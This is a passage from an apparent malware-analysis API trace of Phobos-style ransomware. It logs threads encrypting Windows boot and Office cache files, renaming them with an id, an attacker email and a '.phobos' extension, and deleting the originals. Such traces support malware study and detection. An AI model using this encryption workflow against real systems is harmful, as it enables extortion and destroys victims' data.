dwMilliseconds=0xffffffff) returned 0x0 [0065.480] ResetEvent (hEvent=0xf8) returned 1 [0065.480] SetEvent (hEvent=0xf4) returned 1 [0065.480] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.480] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.481] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=70720) returned 1 [0065.481] CloseHandle (hObject=0x108) returned 1 [0065.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0065.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.484] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.484] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.486] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.487] ResetEvent (hEvent=0xf8) returned 1 [0065.487] SetEvent (hEvent=0xf4) returned 1 [0065.487] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.487] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.488] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=70208) returned 1 [0065.488] CloseHandle (hObject=0x108) returned 1 [0065.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0065.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.488] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.488] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.592] ResetEvent (hEvent=0xf8) returned 1 [0065.592] SetEvent (hEvent=0xf4) returned 1 [0065.592] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.592] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.592] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) Thread: id = 59 os_tid = 0xac4 [0065.335] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xde7aa0 [0065.337] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xdf7aa8 [0065.338] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c1568 [0065.338] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x110102) returned 0x3080020 [0065.338] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c1598 [0065.338] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fb40 | out: phKey=0x307fb40*=0x2ed798) returned 1 [0065.338] CryptSetKeyParam (hKey=0x2ed798, dwParam=0x1, pbData=0x307fb28, dwFlags=0x0) returned 1 [0065.338] CryptDecrypt (in: hKey=0x2ed798, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1598, pdwDataLen=0x307faf4 | out: pbData=0x8c1598, pdwDataLen=0x307faf4) returned 1 [0065.338] CryptDestroyKey (hKey=0x2ed798) returned 1 [0065.339] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0065.339] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0065.339] Wow64DisableWow64FsRedirection (in: OldValue=0x307fb8c | out: OldValue=0x307fb8c*=0x0) returned 1 [0065.339] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1598 | out: hHeap=0x8c0000) returned 1 [0065.339] ResetEvent (hEvent=0x134) returned 1 [0065.339] SetEvent (hEvent=0x138) returned 1 [0065.339] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x307fb90 | out: pbBuffer=0x307fb90) returned 1 [0065.339] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0065.339] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x307fb30 | out: lpFileSize=0x307fb30*=129) returned 1 [0065.339] CloseHandle (hObject=0xec) returned 1 [0065.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0065.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.340] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0065.340] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.340] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.340] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.340] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fa88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fae4 | out: phKey=0x307fae4*=0x2ed828) returned 1 [0065.340] CryptSetKeyParam (hKey=0x2ed828, dwParam=0x1, pbData=0x307fb90, dwFlags=0x0) returned 1 [0065.340] ReadFile (in: hFile=0xec, lpBuffer=0x3080020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x307fb0c, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesRead=0x307fb0c*=0x81, lpOverlapped=0x0) returned 1 [0065.356] CryptEncrypt (in: hKey=0x2ed828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3080020*, pdwDataLen=0x307faa8*=0x90, dwBufLen=0x90 | out: pbData=0x3080020*, pdwDataLen=0x307faa8*=0x90) returned 1 [0065.356] WriteFile (in: hFile=0xf0, lpBuffer=0x3080020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x307faf0, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesWritten=0x307faf0*=0x90, lpOverlapped=0x0) returned 1 [0065.357] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fa7c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fae8 | out: phKey=0x307fae8*=0x2f2168) returned 1 [0065.357] CryptSetKeyParam (hKey=0x2f2168, dwParam=0x1, pbData=0x307fb90, dwFlags=0x0) returned 1 [0065.357] CryptEncrypt (in: hKey=0x2f2168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3080020*, pdwDataLen=0x307faa8*=0x40, dwBufLen=0x40 | out: pbData=0x3080020*, pdwDataLen=0x307faa8*=0x40) returned 1 [0065.357] CryptDestroyKey (hKey=0x2f2168) returned 1 [0065.358] WriteFile (in: hFile=0xf0, lpBuffer=0x3080020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x307faf0, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesWritten=0x307faf0*=0xf2, lpOverlapped=0x0) returned 1 [0065.358] CryptDestroyKey (hKey=0x2ed828) returned 1 [0065.358] CloseHandle (hObject=0xec) returned 1 [0065.358] CloseHandle (hObject=0xf0) returned 1 [0065.363] DeleteFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0065.367] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0065.396] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0065.397] ResetEvent (hEvent=0x134) returned 1 [0065.397] SetEvent (hEvent=0x138) returned 1 [0065.397] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x307fb90 | out: pbBuffer=0x307fb90) returned 1 [0065.397] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9c [0065.398] GetFileSizeEx (in: hFile=0x9c, lpFileSize=0x307fb30 | out: lpFileSize=0x307fb30*=65536) returned 1 [0065.398] CloseHandle (hObject=0x9c) returned 1 [0065.398] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0065.398] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\bootstat.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.398] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9c [0065.398] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.398] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.398] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\bootstat.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.399] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fa88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fae4 | out: phKey=0x307fae4*=0x2f3170) returned 1 [0065.399] CryptSetKeyParam (hKey=0x2f3170, dwParam=0x1, pbData=0x307fb90, dwFlags=0x0) returned 1 [0065.399] ReadFile (in: hFile=0x9c, lpBuffer=0x3080020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x307fb0c, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesRead=0x307fb0c*=0x10000, lpOverlapped=0x0) returned 1 [0065.401] CryptEncrypt (in: hKey=0x2f3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3080020*, pdwDataLen=0x307faa8*=0x10010, dwBufLen=0x10010 | out: pbData=0x3080020*, pdwDataLen=0x307faa8*=0x10010) returned 1 [0065.401] WriteFile (in: hFile=0xa0, lpBuffer=0x3080020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x307faf0, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesWritten=0x307faf0*=0x10010, lpOverlapped=0x0) returned 1 [0065.403] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fa7c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fae8 | out: phKey=0x307fae8*=0x2f3450) returned 1 [0065.403] CryptSetKeyParam (hKey=0x2f3450, dwParam=0x1, pbData=0x307fb90, dwFlags=0x0) returned 1 [0065.403] CryptEncrypt (in: hKey=0x2f3450, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3080020*, pdwDataLen=0x307faa8*=0x40, dwBufLen=0x40 | out: pbData=0x3080020*, pdwDataLen=0x307faa8*=0x40) returned 1 [0065.403] CryptDestroyKey (hKey=0x2f3450) returned 1 [0065.403] WriteFile (in: hFile=0xa0, lpBuffer=0x3080020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x307faf0, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesWritten=0x307faf0*=0xf2, lpOverlapped=0x0) returned 1 [0065.404] CryptDestroyKey (hKey=0x2f3170) returned 1 [0065.404] CloseHandle (hObject=0x9c) returned 1 [0065.404] CloseHandle (hObject=0xa0) returned 1 [0065.408] DeleteFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0065.410] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0065.455] ResetEvent (hEvent=0x134) returned 1 [0065.455] SetEvent (hEvent=0x138) returned 1 [0065.464] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x307fb90 | out: pbBuffer=0x307fb90) returned 1 [0065.464] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0065.589] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x307fb30 | out: lpFileSize=0x307fb30*=8192) returned 1 [0065.589] CloseHandle (hObject=0x12c) returned 1 [0065.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0065.589] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0065.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\bootsect.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.590] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0065.590] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.590] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.590] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\bootsect.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9c [0065.590] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fa88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fae4 | out: phKey=0x307fae4*=0x2ebd30) returned 1 [0065.590] CryptSetKeyParam (hKey=0x2ebd30, dwParam=0x1, pbData=0x307fb90, dwFlags=0x0) returned 1 [0065.590] ReadFile (in: hFile=0x12c, lpBuffer=0x3080020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x307fb0c, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesRead=0x307fb0c*=0x2000, lpOverlapped=0x0) returned 1 [0065.738] CryptEncrypt (in: hKey=0x2ebd30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3080020*, pdwDataLen=0x307faa8*=0x2010, dwBufLen=0x2010 | out: pbData=0x3080020*, pdwDataLen=0x307faa8*=0x2010) returned 1 [0065.738] WriteFile (in: hFile=0x9c, lpBuffer=0x3080020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x307faf0, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesWritten=0x307faf0*=0x2010, lpOverlapped=0x0) returned 1 [0065.740] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fa7c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fae8 | out: phKey=0x307fae8*=0x2f6260) returned 1 [0065.740] CryptSetKeyParam (hKey=0x2f6260, dwParam=0x1, pbData=0x307fb90, dwFlags=0x0) returned 1 [0065.740] CryptEncrypt (in: hKey=0x2f6260, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3080020*, pdwDataLen=0x307faa8*=0x40, dwBufLen=0x40 | out: pbData=0x3080020*, pdwDataLen=0x307faa8*=0x40) returned 1 [0065.740] CryptDestroyKey (hKey=0x2f6260) returned 1 [0065.740] WriteFile (in: hFile=0x9c, lpBuffer=0x3080020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x307faf0, lpOverlapped=0x0 | out: lpBuffer=0x3080020*, lpNumberOfBytesWritten=0x307faf0*=0xf2, lpOverlapped=0x0) returned 1 [0065.740] CryptDestroyKey (hKey=0x2ebd30) returned 1 [0065.740] CloseHandle (hObject=0x12c) returned 1 [0065.740] CloseHandle (hObject=0x9c) returned 1 [0065.745] DeleteFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0065.746] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.id[9C354B42-0001].[tedmundboardus@aol.com].phobos", dwFileAttributes=0x27) returned 1 [0065.746] ResetEvent (hEvent=0x134) returned 1 [0065.746] SetEvent (hEvent=0x138) returned 1 [0065.746] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x307fb90 | out: pbBuffer=0x307fb90) returned 1 [0065.746] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9c [0065.747] GetFileSizeEx (in: hFile=0x9c, lpFileSize=0x307fb30 | out: lpFileSize=0x307fb30*=2296) returned 1 [0065.747] CloseHandle (hObject=0x9c) returned 1 [0065.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0065.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.748] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9c [0065.748] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.748] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fad0 | out: lpNewFilePointer=0x0) returned 1 [0065.748] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0065.748] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x307fa88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x307fae4 | out: phKey=0x307fae4*=0x2f6260) returned 1 [0065.748] CryptSetKeyParam (hKey=0x2f6260, dwParam=0x1, pbData=0x307fb90, dwFlags=0x0) returned 1 Thread: id = 60 os_tid = 0xac8 [0065.368] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xe07ab0 [0065.369] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0x32f0048 [0065.371] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c1598 [0065.371] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x110102) returned 0x34f0020 [0065.371] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c54a0 [0065.371] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x32efa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32efad0 | out: phKey=0x32efad0*=0x2ed828) returned 1 [0065.371] CryptSetKeyParam (hKey=0x2ed828, dwParam=0x1, pbData=0x32efab8, dwFlags=0x0) returned 1 [0065.371] CryptDecrypt (in: hKey=0x2ed828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c54a0, pdwDataLen=0x32efa84 | out: pbData=0x8c54a0, pdwDataLen=0x32efa84) returned 1 [0065.371] CryptDestroyKey (hKey=0x2ed828) returned 1 [0065.372] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0065.372] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0065.372] Wow64DisableWow64FsRedirection (in: OldValue=0x32efb1c | out: OldValue=0x32efb1c*=0x0) returned 1 [0065.372] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54a0 | out: hHeap=0x8c0000) returned 1 [0065.372] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0065.396] ResetEvent (hEvent=0x134) returned 1 [0065.396] SetEvent (hEvent=0x138) returned 1 [0065.396] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x32efb20 | out: pbBuffer=0x32efb20) returned 1 [0065.396] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.396] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0065.400] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0065.465] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0065.719] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x32efb20 | out: pbBuffer=0x32efb20) returned 1 [0065.719] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0065.720] GetFileSizeEx (in: hFile=0x150, lpFileSize=0x32efac0 | out: lpFileSize=0x32efac0*=1565) returned 1 [0065.720] CloseHandle (hObject=0x150) returned 1 [0065.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0065.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.721] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0065.721] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32efa60 | out: lpNewFilePointer=0x0) returned 1 [0065.721] 